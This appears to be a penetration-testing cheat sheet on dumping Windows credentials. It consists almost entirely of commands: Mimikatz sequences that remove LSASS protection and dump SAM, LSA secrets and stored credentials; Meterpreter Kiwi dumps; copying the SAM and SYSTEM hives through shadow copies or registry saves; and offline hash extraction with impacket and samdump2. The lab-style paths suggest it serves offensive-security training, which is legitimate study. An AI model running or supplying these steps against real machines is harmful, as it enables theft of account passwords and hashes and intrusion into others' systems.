Windows Credentials

Password hash dump and reuse

Password Dumping Cheatsheet: WindowsHacking Articles

How to use Mimikatz for Hacking in 2026: The Definitive GuideStationX

Local

SID in SAM

PowerShell

$env:computername
[wmi] "Win32_userAccount.Domain='client',Name='Administrator'"

S-1-5-21-1673717583-1524682655-2710527411-500

whoami /user

Mimikatz

privilege::debug
token::elevate
!+
!processprotect /process:lsass.exe /remove
sekurlsa::credman
lsadump::sam
lsadump::secrets

Alternative from LSA

privilege::debug
lsadump::lsa /patch

lsadump::lsa /inject

Meterpreter Kiwi

meterpreter > hashdump
meterpreter > load kiwi
meterpreter > creds_all
meterpreter > lsa_dump_sam
meterpreter > lsa_dump_secrets

Shadow Copy (admin)

1) cmd

wmic shadowcopy call create Volume='C:\'

2) cmd

vssadmin list shadows

3) cmd

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sam C:\users\offsec.corp1\Downloads\sam

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system C:\users\offsec.corp1\Downloads\system

Registry (admin)

cmd

reg save HKLM\sam C:\users\offsec.corp1\Downloads\sam
reg save HKLM\system C:\users\offsec.corp1\Downloads\system

Decrypt

in Kali

impacket-secretsdump -system SYSTEM -sam SAM LOCAL
samdump2 SYSTEM SAM
python pwdump.py /home/kali/system /home/kali/sam

PreviousJust-In-Time (JIT) Access NextLocal Administrator Password Solution (LAPS)

Last updated 1 year ago

hashtagLocal

hashtagSID in SAM

hashtagMimikatz

hashtagAlternative from LSA

hashtagMeterpreter Kiwi

hashtagShadow Copy (admin)

hashtagRegistry (admin)

hashtagDecrypt

Local

SID in SAM

Mimikatz

Alternative from LSA

Meterpreter Kiwi

Shadow Copy (admin)

Registry (admin)

Decrypt